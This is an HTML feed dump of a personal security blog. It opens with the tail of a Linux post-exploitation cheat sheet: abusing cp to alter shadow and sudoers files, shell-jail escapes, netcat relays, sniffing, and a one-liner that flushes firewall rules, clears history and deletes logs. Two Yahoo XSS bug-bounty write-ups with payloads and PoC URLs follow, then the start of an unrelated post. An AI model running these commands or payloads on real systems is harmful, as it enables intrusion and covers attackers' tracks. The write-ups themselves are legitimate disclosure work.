</span></p><p><span style="font-family: courier; font-size: medium;">## (2) notice the use of "--no-preserve" this is needed to read out protected files.</span></p><p><span style="font-family: courier; font-size: medium;">## A lot of ways we can abuse this, update the shadow file with a new account, modify sudoers, plant ssh key + modify sshd_config ## + reboot,or cron.hourly.</span></p><p><span style="font-family: courier; font-size: medium;"><br /></span></p></code></pre><p><span style="font-family: courier; font-size: medium;"> <b>== File system ==</b></span></p><pre><code><p><span style="font-family: courier; font-size: medium;">df -ah // all FS info, including pseudo, duplicate, INACCESSIBLE file systems</span></p><p><span style="font-family: courier; font-size: medium;"><br /></span></p></code></pre><p><span style="font-family: courier; font-size: medium;"><b>## Are there any unmounted file-systems?</b></span></p><pre><code><p><span style="font-family: courier; font-size: medium;">cat /etc/fstab</span></p><p><span style="font-family: courier; font-size: medium;"><br /></span></p><p><span style="font-family: courier; font-size: medium;"><br /></span></p></code></pre><p><span style="font-family: courier; font-size: medium;"> <b>=== Networking, Routing & Communications: ===</b></span></p><pre><code><p><span style="font-family: courier; font-size: medium;"><br /></span></p><p><span style="font-family: courier; font-size: medium;">/sbin/ifconfig -a // List all network interfaces</span></p><p><span style="font-family: courier; font-size: medium;">cat /etc/network/interfaces // As above</span></p><p><span style="font-family: courier; font-size: medium;">cat /etc/sysconfig/network </span></p><p><span style="font-family: courier; font-size: medium;">arp -a Display ARP communications</span></p><p><span style="font-family: courier; font-size: medium;">route Display route information</span></p><p><span style="font-family: courier; font-size: medium;">cat /etc/resolv.conf Show configured DNS sever addresses</span></p><p><span style="font-family: courier; font-size: medium;">netstat -antp List all TCP sockets and related PIDs (-p Privileged command)</span></p><p><span style="font-family: courier; font-size: medium;">netstat -anup List all UDP sockets and related PIDs (-p Privileged command)</span></p><p><span style="font-family: courier; font-size: medium;">iptables -L List rules β Privileged command</span></p><p><span style="font-family: courier; font-size: medium;">cat /etc/services View port numbers/services mappings</span></p><p><span style="font-family: courier; font-size: medium;"><br /></span></p><p><span style="font-family: courier; font-size: medium;"><br /></span></p></code></pre><p><span style="font-family: courier; font-size: medium;"> <b>=== What are the network configuration settings? What can you find out about this network? DHCP server? DNS server? Gateway? ===</b></span></p><pre><code><p><span style="font-family: courier; font-size: medium;">cat /etc/resolv.conf</span></p><p><span style="font-family: courier; font-size: medium;">cat /etc/sysconfig/network</span></p><p><span style="font-family: courier; font-size: medium;">cat /etc/networks</span></p><p><span style="font-family: courier; font-size: medium;">iptables -L</span></p><p><span style="font-family: courier; font-size: medium;">hostname</span></p><p><span style="font-family: courier; font-size: medium;">dnsdomainname</span></p><p><span style="font-family: courier; font-size: medium;"><br /></span></p><p><span style="font-family: courier; font-size: medium;"><br /></span></p></code></pre><p><span style="font-family: courier; font-size: medium;"> <b>=== Common Shell Escape Sequences: ===</b></span></p><pre><code><p><span style="font-family: courier; font-size: medium;"><b>## If commands are limited, you break out of the "jail" shell?</b></span></p><p><span style="font-family: courier; font-size: medium;">python -c 'import pty;pty.spawn("/bin/bash")'</span></p><p><span style="font-family: courier; font-size: medium;">echo os.system('/bin/bash')</span></p><p><span style="font-family: courier; font-size: medium;">/bin/sh -i</span></p><p><span style="font-family: courier; font-size: medium;"><br /></span></p><p><span style="font-family: courier; font-size: medium;">:!bash vi, vim</span></p><p><span style="font-family: courier; font-size: medium;">:set shell=/bin/bash</span><span style="font-family: courier; font-size: large;">:shell vi, vim</span></p><p><span style="font-family: courier; font-size: medium;">!bash man, more, less</span></p><p><span style="font-family: courier; font-size: medium;">find / -exec /usr/bin/awk 'BEGIN {system("/bin/bash")}' ; find</span></p><p><span style="font-family: courier; font-size: medium;">awk 'BEGIN {system("/bin/bash")}' awk</span></p><p><span style="font-family: courier; font-size: medium;">--interactive nmap</span></p><p><span style="font-family: courier; font-size: medium;">perl -e 'exec "/bin/bash";' Perl </span></p><p><span style="font-family: courier; font-size: medium;"> </span></p><p><span style="font-family: courier; font-size: medium;"> </span></p></code></pre><p><span style="font-family: courier; font-size: medium;"> <b>=== What other users & hosts are communicating with the system? ===</b></span></p><pre><code><p><span style="font-family: courier; font-size: medium;">lsof -i </span></p><p><span style="font-family: courier; font-size: medium;">lsof -i :80</span></p><p><span style="font-family: courier; font-size: medium;">grep 80 /etc/services</span></p><p><span style="font-family: courier; font-size: medium;">netstat -antup</span></p><p><span style="font-family: courier; font-size: medium;">netstat -antpx</span></p><p><span style="font-family: courier; font-size: medium;">netstat -tulpn</span></p><p><span style="font-family: courier; font-size: medium;">chkconfig --list</span></p><p><span style="font-family: courier; font-size: medium;">chkconfig --list | grep 3:on</span></p><p><span style="font-family: courier; font-size: medium;"><br /></span></p></code></pre><p><span style="font-family: courier; font-size: medium;"> <b>=== Whats cached? IP and/or MAC addresses ===</b></span></p><pre><code><p><span style="font-family: courier; font-size: medium;">arp -e</span></p><p><span style="font-family: courier; font-size: medium;">route</span></p><p><span style="font-family: courier; font-size: medium;">/sbin/route -nee</span></p></code></pre><p><span style="font-family: courier; font-size: medium;"> <b>=== Is packet sniffing possible? What can be seen? Listen to live traffic ===</b></span></p><pre><code><p><span style="font-family: courier; font-size: medium;"># tcpdump tcp dst [ip] [port] and tcp dst [ip] [port]</span></p><p><span style="font-family: courier; font-size: medium;">tcpdump tcp dst 192.168.1.7 80 and tcp dst 10.2.2.222 21</span></p><p><span style="font-family: courier; font-size: medium;">tcpdump -n dst host 192.168.1.5 -vvv -n -w file.cap</span></p></code></pre><p><span style="font-family: courier; font-size: medium;"> <b> === Is port forwarding possible? Redirect and interact with traffic from another view ==</b></span></p><pre><code><p><span style="font-family: courier; font-size: medium;"><b># rinetd</b></span></p><p><span style="font-family: courier; font-size: medium;">http://www.howtoforge.com/port-forwarding-with-rinetd-on-debian-etch</span></p><p><span style="font-family: courier; font-size: medium;"><br /></span></p><p><span style="font-family: courier; font-size: medium;"># fpipe</span></p><p><span style="font-family: courier; font-size: medium;">FPipe.exe -l [local port] -r [remote port] -s [local port] [local IP]</span></p><p><span style="font-family: courier; font-size: medium;">FPipe.exe -l 80 -r 80 -s 80 192.168.1.7</span></p><p><span style="font-family: courier; font-size: medium;"><br /></span></p><p><span style="font-family: courier; font-size: medium;"># ssh -[L/R] [local port]:[remote ip]:[remote port] [local user]@[local ip]</span></p><p><span style="font-family: courier; font-size: medium;">ssh -L 8080:127.0.0.1:80 root@192.168.1.7 # Local Port</span></p><p><span style="font-family: courier; font-size: medium;">ssh -R 8080:127.0.0.1:80 root@192.168.1.7 # Remote Port</span></p><p><span style="font-family: courier; font-size: medium;"><br /></span></p><p><span style="font-family: courier; font-size: medium;"># mknod backpipe p ; nc -l -p [remote port] < backpipe | nc [local IP] [local port] >backpipe</span></p><p><span style="font-family: courier; font-size: medium;">mknod backpipe p ; nc -l -p 8080 < backpipe | nc 10.1.1.251 80 >backpipe # Port Relay</span></p><p><span style="font-family: courier; font-size: medium;">mknod backpipe p ; nc -l -p 8080 0 & < backpipe | tee -a inflow | nc localhost 80 | tee -a outflow 1>backpipe # Proxy (Port 80 to 8080)</span></p><p><span style="font-family: courier; font-size: medium;">mknod backpipe p ; nc -l -p 8080 0 & < backpipe | tee -a inflow | nc localhost 80 | tee -a outflow & 1>backpipe # Proxy monitor (Port 80 to 8080)</span></p><p><span style="font-family: courier; font-size: medium;"><br /></span></p></code></pre><p><span style="font-family: courier; font-size: medium;"><b>## Is tunneling possible? Send commands locally, remotely</b></span></p><pre><code><p><span style="font-family: courier; font-size: medium;">ssh -D 127.0.0.1:9050 -N [username]@[ip] </span></p><p><span style="font-family: courier; font-size: medium;">proxychains ifconfig</span></p><p><span style="font-family: courier; font-size: medium;"><br /></span></p></code></pre><p><span style="font-family: courier; font-size: medium;"><b>#copy bash to a new subshell</b></span></p><pre><code><p><span style="font-family: courier; font-size: medium;">mount an NFS share from a remote server, copy bash from local to remote and execute</span></p><p><span style="font-family: courier; font-size: medium;">cp -p ./bash /mnt/share/newbash</span></p><p><span style="font-family: courier; font-size: medium;">./newbash -p</span></p></code></pre><p><span style="font-family: courier; font-size: medium;"> <b>=== Preparation & Finding Exploit Code ===</b></span></p><p><span style="font-family: courier; font-size: medium;"><b>## What development tools/languages are installed/supported?</b></span></p><pre><code><p><span style="font-family: courier; font-size: medium;">find / -name perl*</span></p><p><span style="font-family: courier; font-size: medium;">find / -name python*</span></p><p><span style="font-family: courier; font-size: medium;">find / -name gcc* </span></p><p><span style="font-family: courier; font-size: medium;">find / -name cc</span></p><p><br /></p></code></pre><p><span style="font-family: courier; font-size: medium;"><b>## How can files be uploaded?</b></span></p><pre><code><p><span style="font-family: courier; font-size: medium;">find / -name wget</span></p><p><span style="font-family: courier; font-size: medium;">find / -name nc*</span></p><p><span style="font-family: courier; font-size: medium;">find / -name netcat*</span></p><p><span style="font-family: courier; font-size: medium;">find / -name tftp* </span></p><p><span style="font-family: courier; font-size: medium;">find / -name ftp </span></p></code></pre><h3 style="text-align: left;"><span style="font-family: courier; font-size: medium;"><b>#copy files with SSH</b></span></h3><pre><code><div style="text-align: left;"><span style="font-family: courier; font-size: medium;">scp username@b:/path/to/file /path/to/destination //while being logged into A</span></div><p><span style="font-family: courier; font-size: medium;">scp /path/to/file username@a:/path/to/destination //while being logged into B</span></p></code></pre><p><span style="font-family: courier; font-size: medium;"><b>#compile C with gcc</b></span></p><pre><code><p><span style="font-family: courier; font-size: medium;">gcc ./ajaira_exploit.c -o exploit</span></p></code></pre><p><span style="font-family: courier; font-size: medium;"><b>#clear history, iptables and logs</b></span></p><pre><code><p><span style="font-family: courier; font-size: medium;">iptables -F; history -c; find ./ -name β*.logβ |xargs rm -f</span></p><p><span style="font-family: courier; font-size: medium;"><br /></span></p></code></pre><p><span style="font-family: courier; font-size: medium;"><b># Postfix version</b></span></p><pre><code><p><span style="font-family: courier; font-size: medium;">postconf -d | grep mail_vers</span></p><p><span style="font-family: courier; font-size: medium;"><br /></span></p></code></pre><p><span style="font-family: courier; font-size: medium;"><b>./Will_be_continue | everything is collected</b></span></p>TheShahzadahttp://www.blogger.com/profile/01405567763403009941noreply@blogger.com0tag:blogger.com,1999:blog-1395592345970778383.post-44893061464991453702018-08-12T23:38:00.002+06:002021-01-24T16:38:44.716+06:00Stored XSS in Yahoo!<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="graf graf--p graf-after--h3" id="a17c" name="a17c" style="--baseline-multiplier: 0.17; background-color: white; color: rgba(0, 0, 0, 0.84); letter-spacing: -0.003em; line-height: 1.58; margin-top: 10px;">
<div style="text-align: center;">
<br /><b><span style="font-family: courier; font-size: medium;">
Sharing is Caring :)</span></b></div>
<div style="text-align: center;"><b><span style="font-family: courier; font-size: medium;">
When we share, we open doors to a new beginning...../</span></b></div>
</div>
<div class="graf graf--p graf-after--p" id="0428" name="0428" style="--baseline-multiplier: 0.17; background-color: white; color: rgba(0, 0, 0, 0.84); letter-spacing: -0.003em; line-height: 1.58; margin-top: 29px;">
<div style="text-align: center;"><span style="font-family: courier; font-size: medium;">
Well, <span style="letter-spacing: -0.003em;">now I am going to share how I found Stored Cross-Site Scripting (XSS) in Yahoo.</span></span></div>
</div>
<div>
<div style="text-align: center;">
<span color="rgba(0 , 0 , 0 , 0.84)" style="background-color: white; letter-spacing: -0.015em;"><br /></span></div>
<div style="text-align: center;">
<span color="rgba(0 , 0 , 0 , 0.84)" style="background-color: white; font-family: courier; font-size: medium; letter-spacing: -0.015em;"><b>Steps to Reproduce:</b></span></div>
</div>
<div>
<div class="graf graf--p graf-after--h3" id="b442" name="b442" style="--baseline-multiplier: 0.17; background-color: white; letter-spacing: -0.003em; line-height: 1.58; margin-top: 8px;">
<div style="text-align: center;"><b style="color: rgba(0, 0, 0, 0.84);"><span style="font-family: courier; font-size: medium;">
Go to:</span></b><span style="font-family: courier; font-size: medium;"><span color="rgba(0, 0, 0, 0.84)"> </span><a class="markup--anchor markup--p-anchor" data-href="https://www.yahoo.com/news" href="https://www.yahoo.com/news" rel="nofollow noopener" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0.54); background-color: transparent; background-image: linear-gradient(rgba(0, 0, 0, 0.68) 50%, rgba(0, 0, 0, 0) 50%); background-position: 0px 1.07em; background-repeat: repeat-x; background-size: 2px 0.1em; text-decoration-line: none;" target="_blank"><span style="color: #2b00fe;">https://www.yahoo.com/news</span></a></span></div>
</div>
<div class="graf graf--p graf-after--h3" id="b442" name="b442" style="background-color: white; line-height: 1.58; margin-top: 8px;">
<div style="text-align: left;">
<div style="color: rgba(0, 0, 0, 0.84); letter-spacing: -0.003em; text-align: center;"><span style="letter-spacing: -0.063px;"><b><span style="font-family: courier; font-size: medium;">Comment this Payload:</span></b><span style="font-family: courier; font-size: medium;"><pre><code>&quot;&gt;&lt;img src=x onerror=confirm(1);&gt</code></pre></span></span></div>
<div style="color: rgba(0, 0, 0, 0.84); letter-spacing: -0.003em; text-align: center;">
<span style="font-family: , "georgia" , "cambria" , "times new roman" , "times" , serif; letter-spacing: -0.063px;"><br /></span></div>
<div class="separator" style="clear: both; color: rgba(0, 0, 0, 0.84); letter-spacing: -0.003em; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj6BuiDYVCWKySPhsRKLnaKYDPAUsvGCBGHCKcFdWww2hDSqksPn1NKfX-hjZdMHsIeyiX3aJVzp1uPcBR1o2NQm-mQDofuycoPTyEvoHGLFFA2dcnE7fDScKo0_H9tT08DHIruC_Z4hIo/s1600/yahoo+news.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="876" data-original-width="1600" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj6BuiDYVCWKySPhsRKLnaKYDPAUsvGCBGHCKcFdWww2hDSqksPn1NKfX-hjZdMHsIeyiX3aJVzp1uPcBR1o2NQm-mQDofuycoPTyEvoHGLFFA2dcnE7fDScKo0_H9tT08DHIruC_Z4hIo/s1600/yahoo+news.png" /></a></div>
<div style="color: rgba(0, 0, 0, 0.84); letter-spacing: -0.003em; text-align: center;">
<span style="font-family: , "georgia" , "cambria" , "times new roman" , "times" , serif; letter-spacing: -0.063px;"><br /></span></div>
<div style="color: rgba(0, 0, 0, 0.84); letter-spacing: -0.003em; text-align: center;">
<span style="font-family: , "georgia" , "cambria" , "times new roman" , "times" , serif; letter-spacing: -0.063px;"><br /></span></div>
<div style="color: rgba(0, 0, 0, 0.84); letter-spacing: -0.003em; text-align: center;">
<span style="letter-spacing: -0.063px;"><span style="font-family: courier; font-size: medium; letter-spacing: -0.063px;">Now what? Voila! We get the famous confirm(1) to a popup! :D</span></span></div>
<div class="separator" style="clear: both; color: rgba(0, 0, 0, 0.84); letter-spacing: -0.003em; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhI_3sYSyIr1NStS2BdxhPDgaGmof7yYhFsSfCHRGoLLEqhWppaTyCflFfhAh2vJpPtvNbT2HzzB-5QOzBVccwVx2Jthn1PPTzTwB5uRI9qwImZhZkACMcV2lYoeIGmqqygN9D-sujZjtY/s1600/Yahoo+XSS.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="274" data-original-width="1004" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhI_3sYSyIr1NStS2BdxhPDgaGmof7yYhFsSfCHRGoLLEqhWppaTyCflFfhAh2vJpPtvNbT2HzzB-5QOzBVccwVx2Jthn1PPTzTwB5uRI9qwImZhZkACMcV2lYoeIGmqqygN9D-sujZjtY/s1600/Yahoo+XSS.png" /></a></div>
<div style="color: rgba(0, 0, 0, 0.84); letter-spacing: -0.003em; text-align: center;">
<br /></div>
<div style="color: rgba(0, 0, 0, 0.84); letter-spacing: -0.003em;">
</div>
<div style="text-align: center;">
<span style="font-family: courier; font-size: medium;"><span style="letter-spacing: -0.063px;">I am trying another payload that I can write something in the popup box, and found this payload: </span><code class="markup--code markup--p-code" style="background: rgba(0, 0, 0, 0.05); letter-spacing: -0.063px; margin: 0px 2px; padding: 3px 4px;"><span style="font-family: courier;"><pre><code>&lt;img src=x onerror=prompt(1337)&gt;</code></pre></span></code></span></div>
<span style="font-family: , "georgia" , "cambria" , "times new roman" , "times" , serif; font-size: 21px; letter-spacing: -0.063px;"></span><br />
<div style="text-align: center;">
<span style="letter-spacing: -0.063px;"><span style="font-family: courier; font-size: medium; letter-spacing: -0.063px;"> That moment I feel like a boss! :P</span></span></div>
<span style="font-family: , "georgia" , "cambria" , "times new roman" , "times" , serif; font-size: 21px; letter-spacing: -0.063px;"> </span><br />
<div class="separator" style="clear: both; color: rgba(0, 0, 0, 0.84); letter-spacing: -0.003em; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiOroTr_EV4vPGYf_F7__U4Tl6aiJaZVYvcaTKlUllo0GszXO4vUuIdqSiL7xT2GTlzNxQwL6k988n86UkLP4Uvyye6tPBqNCHub2sTbyKIm_u3DV_q_nd97tkhAllnAPoYYj_yvRR-M6Y/s1600/LIKE+A+BOSS.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="600" data-original-width="1200" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiOroTr_EV4vPGYf_F7__U4Tl6aiJaZVYvcaTKlUllo0GszXO4vUuIdqSiL7xT2GTlzNxQwL6k988n86UkLP4Uvyye6tPBqNCHub2sTbyKIm_u3DV_q_nd97tkhAllnAPoYYj_yvRR-M6Y/s1600/LIKE+A+BOSS.jpg" /></a></div>
<div style="color: rgba(0, 0, 0, 0.84); letter-spacing: -0.003em; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; color: rgba(0, 0, 0, 0.84); letter-spacing: -0.003em; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjsZDvc0US4S8whAt745P_jTQB14-HmKxZGw8ANlMaUUQ-wd62I-1RcFF2amnwgqWMtIP1ikSmy2diTaZw_-6eTWYe8RfkIPqM7tmXHAJbMCaQrWO7sJ4ef33efLq-fvdTu0yx6LUnU_ew/s1600/Yahoo+stored+xss.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="382" data-original-width="1044" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjsZDvc0US4S8whAt745P_jTQB14-HmKxZGw8ANlMaUUQ-wd62I-1RcFF2amnwgqWMtIP1ikSmy2diTaZw_-6eTWYe8RfkIPqM7tmXHAJbMCaQrWO7sJ4ef33efLq-fvdTu0yx6LUnU_ew/s1600/Yahoo+stored+xss.png" /></a></div>
<div style="color: rgba(0, 0, 0, 0.84); letter-spacing: -0.003em; text-align: center;">
<br /></div>
<div style="color: rgba(0, 0, 0, 0.84); letter-spacing: -0.003em; text-align: center;">
<br /></div>
<div style="color: rgba(0, 0, 0, 0.84); letter-spacing: -0.003em; text-align: center;">
<span style="font-family: courier; font-size: medium; letter-spacing: -0.063px;"><b>Here is the video PoC:</b></span></div>
<div style="color: rgba(0, 0, 0, 0.84); letter-spacing: -0.003em; text-align: center;">
<span style="font-family: , "georgia" , "cambria" , "times new roman" , "times" , serif; letter-spacing: -0.063px;"><b><br /></b></span></div>
<div class="separator" style="clear: both; text-align: center;">
<iframe allowfullscreen="" class="YOUTUBE-iframe-video" data-thumbnail-src="https://i.ytimg.com/vi/3OAvt8HucN4/0.jpg" frameborder="0" height="266" src="https://www.youtube.com/embed/3OAvt8HucN4?feature=player_embedded" width="320"></iframe></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<h4 class="graf graf--h4 graf-after--figure" id="53ee" name="53ee" style="--baseline-multiplier: 0.22; color: rgba(0, 0, 0, 0.84); letter-spacing: -0.012em; line-height: 1.22; margin: 39px 0px 0px -1.63px;"><span style="font-family: courier;">
Timeline:</span></h4>
<div class="graf graf--p graf-after--h4" id="73da" name="73da" style="--baseline-multiplier: 0.17; color: rgba(0, 0, 0, 0.84); letter-spacing: -0.003em; line-height: 1.58; margin-top: 6px;"><span style="font-family: courier; font-size: medium;">
31/03/2018 β Initial Report.</span></div><div class="graf graf--p graf-after--h4" id="73da" name="73da" style="--baseline-multiplier: 0.17; color: rgba(0, 0, 0, 0.84); letter-spacing: -0.003em; line-height: 1.58; margin-top: 6px;"><span style="font-family: courier; font-size: large; letter-spacing: -0.003em;">01/04/2018 β HackerOne staff asked for Needs more info.</span></div><div class="graf graf--p graf-after--h4" id="73da" name="73da" style="--baseline-multiplier: 0.17; color: rgba(0, 0, 0, 0.84); letter-spacing: -0.003em; line-height: 1.58; margin-top: 6px;"><span style="font-family: courier; font-size: large; letter-spacing: -0.003em;">01/04/2018 β More Info Submitted.</span></div><div class="graf graf--p graf-after--h4" id="73da" name="73da" style="--baseline-multiplier: 0.17; color: rgba(0, 0, 0, 0.84); letter-spacing: -0.003em; line-height: 1.58; margin-top: 6px;"><span style="font-family: courier; font-size: large; letter-spacing: -0.003em;">04/04/2018 β Triaged and a $300 initial bounty rewarded.</span></div><div class="graf graf--p graf-after--h4" id="73da" name="73da" style="--baseline-multiplier: 0.17; color: rgba(0, 0, 0, 0.84); letter-spacing: -0.003em; line-height: 1.58; margin-top: 6px;"><span style="font-family: courier; font-size: large; letter-spacing: -0.003em;">06/04/2018 β Bug Resolved.</span></div><div class="graf graf--p graf-after--h4" id="73da" name="73da" style="--baseline-multiplier: 0.17; color: rgba(0, 0, 0, 0.84); letter-spacing: -0.003em; line-height: 1.58; margin-top: 6px;"><span style="font-family: courier; font-size: large; letter-spacing: -0.003em;">11/04/2018 β Another $1700 bounty rewarded. (Total $2000)</span></div>
<div class="separator" style="clear: both; text-align: center;"><br /></div>
</div>
</div>
</div>
</div>
TheShahzadahttp://www.blogger.com/profile/01405567763403009941noreply@blogger.com0tag:blogger.com,1999:blog-1395592345970778383.post-65732051716334399372017-08-31T01:28:00.007+06:002023-10-06T22:36:55.185+06:00Reflected XSS in yahoo.com<div dir="ltr" style="text-align: left;" trbidi="on">
<div style="text-align: center;"><span style="font-family: courier; font-size: medium;">
Hello Guys, This is <b>Shahzada Al Shahriar Khan</b>.</span></div>
<div style="text-align: center;"><span style="font-family: courier; font-size: medium;">
I am from <b>Bangladesh</b>. And I am Newbie in Bug Bounty. :P</span></div>
<div style="text-align: center;"><span style="font-family: courier; font-size: medium;">
Well, now I will share how I found Reflected Cross-Site Scripting (XSS) in the main & subdomain of <b>Yahoo.</b></span></div>
<div style="text-align: center;">
<span style="font-family: courier; font-size: medium;"><br /></span></div>
<div style="text-align: center;">
<span style="font-family: courier; font-size: medium;"><span face=", , "segoe ui" , "roboto" , "oxygen" , "ubuntu" , "cantarell" , "open sans" , "helvetica neue" , sans-serif" style="background-color: white; border: 0px; box-sizing: border-box; font-stretch: inherit; font-weight: 600; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">Vulnerable URLs:</span><br /><span style="background-color: white;"><pre><code>https://www.yahoo.com/movies/film/[*]</code></pre></span><span style="background-color: white;"><pre><code>https://ca.yahoo.com/movies/film/[*]</code></pre></span>
<span style="background-color: white;"><br /></span></span></div>
<div style="text-align: center;">
<span style="font-family: courier; font-size: medium;"><span face=", , "segoe ui" , "roboto" , "oxygen" , "ubuntu" , "cantarell" , "open sans" , "helvetica neue" , sans-serif" style="background-color: white; border: 0px; box-sizing: border-box; font-stretch: inherit; font-weight: 600; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">Payload:</span><br />
<span style="background-color: white; border: 0px; box-sizing: border-box; font-stretch: inherit; font-variant-numeric: inherit; line-height: inherit; margin: 0px; padding: 0px; text-align: start; vertical-align: baseline;"><span face=", , "segoe ui" , "roboto" , "oxygen" , "ubuntu" , "cantarell" , "open sans" , "helvetica neue" , sans-serif"><pre><code>"><%2fscript><script>alert(document.domain)<%2fscript></code></pre></span></span></span></div>
<div style="text-align: center;">
<span style="background-color: white; text-align: start;"><span style="font-family: courier; font-size: medium;"><br /></span></span></div>
<div style="text-align: center;">
<span style="font-family: courier; font-size: medium;"><span face=", , "segoe ui" , "roboto" , "oxygen" , "ubuntu" , "cantarell" , "open sans" , "helvetica neue" , sans-serif" style="background-color: white; border: 0px; box-sizing: border-box; font-stretch: inherit; font-weight: 600; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">PoC URL:</span><br /><span face=", , "segoe ui" , "roboto" , "oxygen" , "ubuntu" , "cantarell" , "open sans" , "helvetica neue" , sans-serif" style="background-color: white; border: 0px; box-sizing: border-box; font-stretch: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><pre><code>https://www.yahoo.com/movies/film/"><%2fscript><script>alert(document.domain)<%2fscript></code></pre></span><span face=", , "segoe ui" , "roboto" , "oxygen" , "ubuntu" , "cantarell" , "open sans" , "helvetica neue" , sans-serif" style="background-color: white; border: 0px; box-sizing: border-box; font-stretch: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><pre><code>https://ca.yahoo.com/movies/film/"><%2fscript><script>alert(document.domain)<%2fscript></code></pre></span><span face=", , "segoe ui" , "roboto" , "oxygen" , "ubuntu" , "cantarell" , "open sans" , "helvetica neue" , sans-serif" style="background-color: white; border: 0px; box-sizing: border-box; font-stretch: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><br /></span></span></div>
<div style="text-align: center;">
<span style="background-color: white; border: 0px; box-sizing: border-box; font-family: courier; font-size: medium; font-stretch: inherit; font-weight: 600; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">PoC Screenshot:</span></div>
<div style="text-align: center;">
<span face=", , "segoe ui" , "roboto" , "oxygen" , "ubuntu" , "cantarell" , "open sans" , "helvetica neue" , sans-serif" style="background-color: white; border: 0px; box-sizing: border-box; font-size: 13px; font-stretch: inherit; font-weight: 600; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEggSGGQsJcM-GmAiwDpwF43-tX7UsNUSrogzDKblZ-wtiJgy9Dn_BgSkZofM8ScevsjaUpmvBiA6VON18hVienMco8QAZpjbej7-56BQMVj4jLhcoWY48FtPiZNTgDnPfEVXEibEmBy2Rw/s1600/XSS1.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="878" data-original-width="1600" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEggSGGQsJcM-GmAiwDpwF43-tX7UsNUSrogzDKblZ-wtiJgy9Dn_BgSkZofM8ScevsjaUpmvBiA6VON18hVienMco8QAZpjbej7-56BQMVj4jLhcoWY48FtPiZNTgDnPfEVXEibEmBy2Rw/s1600/XSS1.png" /></a></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEinXynizfW34q4N1L3hg3mF0WQolNC1tOE44nsCNsDyu9WY7DCp0DtEna2kzzO2HUSMHipsi3DCw0UZg0qmMhOkwJdzPNIsJT3aVAgUQhbMQFa4Hcwd89Z7CyVmNp7Xu2pRpGly7mud7Bc/s1600/XSS2.png" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="895" data-original-width="1600" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEinXynizfW34q4N1L3hg3mF0WQolNC1tOE44nsCNsDyu9WY7DCp0DtEna2kzzO2HUSMHipsi3DCw0UZg0qmMhOkwJdzPNIsJT3aVAgUQhbMQFa4Hcwd89Z7CyVmNp7Xu2pRpGly7mud7Bc/s1600/XSS2.png" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-family: courier;">Yahoo Canada Subdomain</span></td></tr>
</tbody></table>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div style="text-align: center;">
<span style="background-color: white; border: 0px; box-sizing: border-box; font-family: courier; font-size: medium; font-stretch: inherit; font-weight: 600; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">Video PoC:</span><br />
<span face=", , "segoe ui" , "roboto" , "oxygen" , "ubuntu" , "cantarell" , "open sans" , "helvetica neue" , sans-serif"><span style="background-color: white; font-size: 13px; font-weight: 600;"><br /></span></span></div>
<iframe allowfullscreen="" frameborder="0" height="315" src="https://www.youtube.com/embed/QHRbzyIlpkc" width="560"></iframe>
<br />
<div style="text-align: center;">
<br /><div style="text-align: left;"><span style="background-color: white; font-family: courier; font-size: large; font-weight: 600;">Timeline:</span></div>
<span style="font-family: courier; font-size: medium;"><div style="text-align: left;">Aug 12th - I Submitted The Report.</div><div style="text-align: left;">Aug 15th - Triaged The Report & Rewarded Me a $300 Initial Bounty.</div><div style="text-align: left;">Aug 16th - Bug Resolved</div><div style="text-align: left;">Aug 24th - Another $400 Bounty Rewarded, Total Bounty is $700.</div></span></div>
</div>
TheShahzadahttp://www.blogger.com/profile/01405567763403009941noreply@blogger.com0tag:blogger.com,1999:blog-1395592345970778383.post-29802981120842586422016-02-17T15:19:00.031+06:002021-02-24T16:13:21.796+06:00Imagine A World Without Muslims!<div dir="ltr" style="text-align: left;" trbidi="on">
<div style="text-align: center;"><b><span style="font-family: courier; font-size: x-large;"><br /></span></b></div><div style="text-align: center;"><b><span style="font-family: courier; font-size: x-large;">Imagine A World Without Muslims!</span></b></div><div style="text-align: center;">
<b><span style="font-family: courier; font-size: large;">Without Muslims you wouldn't have: </span></b></div>
<div style="text-align: center;"><span style="font-family: courier; font-size: medium;"><b>
- Coffee </b></span></div>
<div style="text-align: center;"><span style="font-family: courier; font-size: medium;"><b>
- Cameras </b></span></div>
<div style="text-align: center;"><span style="font-family: courier; font-size: medium;"><b>
